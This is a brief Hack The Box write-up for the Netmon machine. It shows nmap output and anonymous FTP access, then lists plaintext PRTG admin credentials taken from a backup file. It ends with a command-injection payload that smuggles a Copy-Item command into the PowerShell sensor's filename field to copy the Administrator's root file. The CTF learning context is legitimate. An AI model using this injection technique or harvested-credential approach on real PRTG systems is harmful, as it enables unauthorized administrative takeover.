Skip to main content
  1. Posts/

HTB Netmon Quick Writeup

·287 words·2 mins
HackTheBox Security writeup hackthebox hacking
Nathan Higley
Nathan Higley
just a guy who likes cyber
Table of Contents



nmap -A -p- -T4:

Starting Nmap 7.70 ( ) at 2019-03-08 20:55 EST
Nmap scan report for
Host is up (0.100s latency).
Not shown: 996 closed ports
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-03-08 20:56:22
|_  start_date: 2019-03-08 20:11:33

TRACEROUTE (using port 5900/tcp)
1   100.19 ms
2   100.41 ms

Got User

Just log in to anonymous FTP and find the user.txt file.

Got Admin Credentials For Web App

Find plaintext credentials in ‘C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak’

username = prtgadmin

password = PrTg@dmin2019

Got Admin Hash

Exploit a vulnerability in the PRGT Netmon’s powershell sensor, more specifically the default powershell script. This allows for execution of a powershell script as administrator. Use the powerline command to copy the root.txt file to a hidden folder that is open to the FTP, and grab the file using FTP.

Test.txt;Copy-Item -Path C:\Users\Administrator\root.txt -Destination C:\ProgramData\1.txt -Force